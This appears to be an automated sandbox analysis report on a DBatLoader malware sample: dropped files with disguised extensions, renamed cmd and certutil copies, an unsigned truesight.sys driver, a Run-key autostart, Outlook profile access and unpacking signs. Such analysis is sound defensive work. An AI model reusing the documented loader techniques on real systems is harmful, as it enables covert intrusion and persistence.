              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: amsi.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: amsi.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: amsi.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: amsi.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: amsi.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: amsi.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: amsi.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: amsi.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: amsi.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: amsi.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: amsi.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: amsi.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: amsi.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: amsi.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: amsi.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: winhttpcom.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: amsi.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: amsi.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: amsi.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: amsi.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: webio.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: schannel.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: dpapi.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: amsi.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: amsi.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: amsi.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: amsi.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: amsi.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: amsi.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: amsi.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: amsi.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: amsi.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: amsi.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: amsi.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: amsi.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: amsi.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: amsi.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: amsi.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: amsi.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: amsi.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: amsi.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: amsi.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: amsi.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: amsi.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: amsi.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: amsi.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: amsi.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: amsi.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: amsi.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: amsi.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: amsi.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: amsi.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: amsi.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: amsi.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: amsi.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: amsi.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: amsi.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: amsi.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: amsi.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: amsi.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: amsi.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: amsi.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: amsi.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: amsi.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: amsi.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: amsi.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: amsi.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: amsi.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: amsi.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: amsi.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: amsi.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: amsi.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: amsi.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: amsi.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: amsi.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: amsi.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: amsi.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: amsi.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: amsi.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: amsi.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: amsi.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: amsi.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: amsi.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??????????.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: amsi.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: amsi.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: amsi.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: amsi.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: amsi.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: amsi.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: amsi.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: amsi.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Users\Public\Libraries\xzeheenC.pifKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
              Source: F.O Pump Istek,Docx.batStatic file information: File size 2966423 > 1048576
              Source: Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: spoolsv.COM, 0000000A.00000002.1610085610.0000000020730000.00000004.00001000.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000002.1612493392.000000002182E000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000003.1575491690.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000002.1614240793.000000007F450000.00000004.00001000.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000002.1611738122.0000000021698000.00000004.00001000.00020000.00000000.sdmp, Cneehezx.PIF, 00000012.00000002.1740602050.0000000020883000.00000004.00001000.00020000.00000000.sdmp, Cneehezx.PIF, 00000012.00000003.1703461302.000000000057C000.00000004.00000020.00020000.00000000.sdmp, Cneehezx.PIF, 00000012.00000002.1745419099.0000000021300000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: easinvoker.pdb source: spoolsv.COM, 0000000A.00000002.1610085610.0000000020730000.00000004.00001000.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000002.1614240793.000000007F450000.00000004.00001000.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000002.1610085610.0000000020750000.00000004.00001000.00020000.00000000.sdmp, Cneehezx.PIF, 00000012.00000002.1740602050.00000000207E3000.00000004.00001000.00020000.00000000.sdmp, Cneehezx.PIF, 00000012.00000002.1740602050.00000000207D0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: _.pdb source: xzeheenC.pif, 00000010.00000002.2757077847.000000002B33B000.00000004.00000020.00020000.00000000.sdmp, xzeheenC.pif, 00000010.00000003.1588311534.0000000029952000.00000004.00000020.00020000.00000000.sdmp, xzeheenC.pif, 00000010.00000003.1584508014.000000002991A000.00000004.00000020.00020000.00000000.sdmp, xzeheenC.pif, 00000010.00000002.2762606604.000000002DCD0000.00000004.08000000.00040000.00000000.sdmp, xzeheenC.pif, 00000010.00000002.2761760799.000000002C591000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 00000016.00000002.2762571543.0000000033961000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 00000016.00000002.2762982213.0000000034CA0000.00000004.08000000.00040000.00000000.sdmp, xzeheenC.pif, 00000016.00000003.1742091076.0000000030AE6000.00000004.00000020.00020000.00000000.sdmp, xzeheenC.pif, 00000016.00000002.2757793426.000000003251B000.00000004.00000020.00020000.00000000.sdmp, xzeheenC.pif, 00000016.00000002.2756654724.0000000030ADD000.00000004.00000020.00020000.00000000.sdmp, xzeheenC.pif, 00000016.00000003.1711857093.0000000030AAE000.00000004.00000020.00020000.00000000.sdmp, xzeheenC.pif, 0000001A.00000003.1811611837.0000000020765000.00000004.00000020.00020000.00000000.sdmp, xzeheenC.pif, 0000001A.00000002.2756450097.000000002227B000.00000004.00000020.00020000.00000000.sdmp, xzeheenC.pif, 0000001A.00000002.2763742215.0000000023781000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 0000001A.00000002.2757133357.00000000226C0000.00000004.08000000.00040000.00000000.sdmp, xzeheenC.pif, 0000001A.00000003.1788843721.000000002072D000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: cmd.pdbUGP source: alpha.exe, 00000004.00000000.1465791907.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000006.00000002.1484029238.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000006.00000000.1470977264.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000008.00000002.1490885781.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000008.00000000.1484636216.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000B.00000002.1493486457.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000B.00000000.1492312116.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000C.00000002.1496642334.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000C.00000000.1494741450.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmp, alpha.exe.3.dr
              Source: Binary string: certutil.pdb source: kn.exe, 00000007.00000000.1471597989.00007FF792E0E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000007.00000002.1483116865.00007FF792E0E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000009.00000000.1485238233.00007FF792E0E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000009.00000002.1489880503.00007FF792E0E000.00000002.00000001.01000000.00000005.sdmp, kn.exe.5.dr
              Source: Binary string: cmd.pdb source: alpha.exe, 00000004.00000000.1465791907.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000006.00000002.1484029238.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000006.00000000.1470977264.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000008.00000002.1490885781.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000008.00000000.1484636216.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000B.00000002.1493486457.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000B.00000000.1492312116.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000C.00000002.1496642334.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000C.00000000.1494741450.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmp, alpha.exe.3.dr
              Source: Binary string: easinvoker.pdbGCTL source: spoolsv.COM, 0000000A.00000002.1610085610.0000000020730000.00000004.00001000.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000003.1576101598.00000000217D2000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000002.1614240793.000000007F450000.00000004.00001000.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000002.1610085610.0000000020750000.00000004.00001000.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000003.1576101598.0000000021801000.00000004.00000020.00020000.00000000.sdmp, Cneehezx.PIF, 00000012.00000002.1740602050.00000000207E3000.00000004.00001000.00020000.00000000.sdmp, Cneehezx.PIF, 00000012.00000003.1700896503.000000000057D000.00000004.00000020.00020000.00000000.sdmp, Cneehezx.PIF, 00000012.00000003.1700896503.00000000005AC000.00000004.00000020.00020000.00000000.sdmp, Cneehezx.PIF, 00000012.00000002.1740602050.00000000207D0000.00000004.00001000.00020000.00000000.sdmp, Cneehezx.PIF, 00000017.00000003.1776083629.0000000000765000.00000004.00000020.00020000.00000000.sdmp, Cneehezx.PIF, 00000017.00000003.1776083629.0000000000736000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: certutil.pdbGCTL source: kn.exe, 00000007.00000000.1471597989.00007FF792E0E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000007.00000002.1483116865.00007FF792E0E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000009.00000000.1485238233.00007FF792E0E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000009.00000002.1489880503.00007FF792E0E000.00000002.00000001.01000000.00000005.sdmp, kn.exe.5.dr

              Data Obfuscation

              barindex
              Detected unpacking (changes PE section rights)
              Source: C:\Users\Public\Libraries\xzeheenC.pifUnpacked PE file: 16.2.xzeheenC.pif.400000.0.unpack .text:ER;.data:W;.tls:W;.rdata:R;.idata:R;.edata:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
              Source: C:\Users\Public\Libraries\xzeheenC.pifUnpacked PE file: 22.2.xzeheenC.pif.400000.0.unpack .text:ER;.data:W;.tls:W;.rdata:R;.idata:R;.edata:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
              Detected unpacking (overwrites its own PE header)
              Source: C:\Users\Public\Libraries\xzeheenC.pifUnpacked PE file: 16.2.xzeheenC.pif.400000.0.unpack
              Source: C:\Users\Public\Libraries\xzeheenC.pifUnpacked PE file: 22.2.xzeheenC.pif.400000.0.unpack
              Yara detected DBatLoader
              Source: Yara matchFile source: 10.2.spoolsv.COM.28f0000.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0000000A.00000002.1586646546.00000000022F6000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000A.00000003.1494549261.000000007FBB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000A.00000002.1615024855.000000007FC80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              .NET source code contains method to dynamically call methods (often used by packers)
              Source: 16.2.xzeheenC.pif.2e330000.8.raw.unpack, WP6RZJql8gZrNhVA9v.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
              Source: 16.2.xzeheenC.pif.2b37c896.1.raw.unpack, WP6RZJql8gZrNhVA9v.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
              Source: 16.3.xzeheenC.pif.2991aba0.0.raw.unpack, WP6RZJql8gZrNhVA9v.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
              Source: 16.2.xzeheenC.pif.2c596478.3.raw.unpack, WP6RZJql8gZrNhVA9v.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
              Source: 16.2.xzeheenC.pif.2c5ce790.4.raw.unpack, WP6RZJql8gZrNhVA9v.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
              Source: alpha.exe.3.drStatic PE information: 0xE1CBFC53 [Mon Jan 16 09:26:43 2090 UTC]
              Source: C:\Users\Public\Libraries\spoolsv.COMCode function: 10_2_029087A0 LoadLibraryW,GetProcAddress,FreeLibrary,10_2_029087A0
              Source: alpha.exe.3.drStatic PE information: section name: .didat
              Source: kn.exe.5.drStatic PE information: section name: .didat
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D23668 push rsp; ret 7_2_00007FF792D23669
              Source: C:\Users\Public\Libraries\spoolsv.COMCode function: 10_2_0291C2FC push 0291C367h; ret 10_2_0291C35F
              Source: C:\Users\Public\Libraries\spoolsv.COMCode function: 10_2_028F32FC push eax; ret 10_2_028F3338
              Source: C:\Users\Public\Libraries\spoolsv.COMCode function: 10_2_028F635C push 028F63B7h; ret 10_2_028F63AF
              Source: C:\Users\Public\Libraries\spoolsv.COMCode function: 10_2_028F635A push 028F63B7h; ret 10_2_028F63AF
              Source: C:\Users\Public\Libraries\spoolsv.COMCode function: 10_2_0291C0AC push 0291C125h; ret 10_2_0291C11D
              Source: C:\Users\Public\Libraries\spoolsv.COMCode function: 10_2_0291C1F8 push 0291C288h; ret 10_2_0291C280
              Source: C:\Users\Public\Libraries\spoolsv.COMCode function: 10_2_0291C144 push 0291C1ECh; ret 10_2_0291C1E4
              Source: C:\Users\Public\Libraries\spoolsv.COMCode function: 10_2_029086C0 push 02908702h; ret 10_2_029086FA
              Source: C:\Users\Public\Libraries\spoolsv.COMCode function: 10_2_028F673E push 028F6782h; ret 10_2_028F677A
              Source: C:\Users\Public\Libraries\spoolsv.COMCode function: 10_2_028F6740 push 028F6782h; ret 10_2_028F677A
              Source: C:\Users\Public\Libraries\spoolsv.COMCode function: 10_2_028FC4F4 push ecx; mov dword ptr [esp], edx10_2_028FC4F9
              Source: C:\Users\Public\Libraries\spoolsv.COMCode function: 10_2_0290E5B4 push ecx; mov dword ptr [esp], edx10_2_0290E5B9
              Source: C:\Users\Public\Libraries\spoolsv.COMCode function: 10_2_028FD528 push 028FD554h; ret 10_2_028FD54C
              Source: C:\Users\Public\Libraries\spoolsv.COMCode function: 10_2_028FCB56 push 028FCCFAh; ret 10_2_028FCCF2
              Source: C:\Users\Public\Libraries\spoolsv.COMCode function: 10_2_028FCB74 push 028FCCFAh; ret 10_2_028FCCF2
              Source: C:\Users\Public\Libraries\spoolsv.COMCode function: 10_2_0291BB6C push 0291BD94h; ret 10_2_0291BD8C
              Source: C:\Users\Public\Libraries\spoolsv.COMCode function: 10_2_02907894 push 02907911h; ret 10_2_02907909
              Source: C:\Users\Public\Libraries\spoolsv.COMCode function: 10_2_029068D0 push 0290697Bh; ret 10_2_02906973
              Source: C:\Users\Public\Libraries\spoolsv.COMCode function: 10_2_029068CE push 0290697Bh; ret 10_2_02906973
              Source: C:\Users\Public\Libraries\spoolsv.COMCode function: 10_2_02908916 push 02908950h; ret 10_2_02908948
              Source: C:\Users\Public\Libraries\spoolsv.COMCode function: 10_2_02908918 push 02908950h; ret 10_2_02908948
              Source: C:\Users\Public\Libraries\spoolsv.COMCode function: 10_2_0290A920 push 0290A958h; ret 10_2_0290A950
              Source: C:\Users\Public\Libraries\spoolsv.COMCode function: 10_2_02902EE8 push 02902F5Eh; ret 10_2_02902F56
              Source: C:\Users\Public\Libraries\spoolsv.COMCode function: 10_2_02905E04 push ecx; mov dword ptr [esp], edx10_2_02905E06
              Source: C:\Users\Public\Libraries\spoolsv.COMCode function: 10_2_02902FF3 push 02903041h; ret 10_2_02903039
              Source: C:\Users\Public\Libraries\spoolsv.COMCode function: 10_2_02902FF4 push 02903041h; ret 10_2_02903039
              Source: 16.2.xzeheenC.pif.2e330000.8.raw.unpack, WP6RZJql8gZrNhVA9v.csHigh entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'B2O7fKYFnJNBC', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
              Source: 16.2.xzeheenC.pif.2b37c896.1.raw.unpack, WP6RZJql8gZrNhVA9v.csHigh entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'B2O7fKYFnJNBC', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
              Source: 16.3.xzeheenC.pif.2991aba0.0.raw.unpack, WP6RZJql8gZrNhVA9v.csHigh entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'B2O7fKYFnJNBC', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
              Source: 16.2.xzeheenC.pif.2c596478.3.raw.unpack, WP6RZJql8gZrNhVA9v.csHigh entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'B2O7fKYFnJNBC', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
              Source: 16.2.xzeheenC.pif.2c5ce790.4.raw.unpack, WP6RZJql8gZrNhVA9v.csHigh entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'B2O7fKYFnJNBC', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'

              Persistence and Installation Behavior

              barindex
              Drops PE files with a suspicious file extension
              Source: C:\Users\Public\kn.exeFile created: C:\Users\Public\Libraries\spoolsv.COMJump to dropped file
              Source: C:\Users\Public\Libraries\spoolsv.COMFile created: C:\Users\Public\Libraries\xzeheenC.pifJump to dropped file
              Source: C:\Users\Public\Libraries\spoolsv.COMFile created: C:\Users\Public\Libraries\Cneehezx.PIFJump to dropped file
              Sample is not signed and drops a device driver
              Source: C:\Users\Public\Libraries\spoolsv.COMFile created: C:\Windows \SysWOW64\truesight.sysJump to behavior
              Source: C:\Users\Public\Libraries\Cneehezx.PIFFile created: C:\Windows \SysWOW64\truesight.sys
              Source: C:\Users\Public\Libraries\Cneehezx.PIFFile created: C:\Windows \SysWOW64\truesight.sys
              Source: C:\Users\Public\kn.exeFile created: C:\Users\Public\Libraries\spoolsv.COMJump to dropped file
              Source: C:\Windows\System32\extrac32.exeFile created: C:\Users\Public\alpha.exeJump to dropped file
              Source: C:\Windows\System32\extrac32.exeFile created: C:\Users\Public\kn.exeJump to dropped file
              Source: C:\Users\Public\Libraries\spoolsv.COMFile created: C:\Users\Public\Libraries\xzeheenC.pifJump to dropped file
              Source: C:\Users\Public\Libraries\spoolsv.COMFile created: C:\Users\Public\Libraries\Cneehezx.PIFJump to dropped file
              Source: C:\Windows\System32\extrac32.exeFile created: C:\Users\Public\alpha.exeJump to dropped file
              Source: C:\Windows\System32\extrac32.exeFile created: C:\Users\Public\kn.exeJump to dropped file

              Boot Survival

              barindex
              Drops PE files to the user root directory
              Source: C:\Windows\System32\extrac32.exeFile created: C:\Users\Public\alpha.exeJump to dropped file
              Source: C:\Windows\System32\extrac32.exeFile created: C:\Users\Public\kn.exeJump to dropped file
              Source: C:\Users\Public\Libraries\spoolsv.COMRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run CneehezxJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run CneehezxJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMCode function: 10_2_0290A95C GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,10_2_0290A95C
              Source: C:\Users\Public\Libraries\xzeheenC.pifRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pifRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
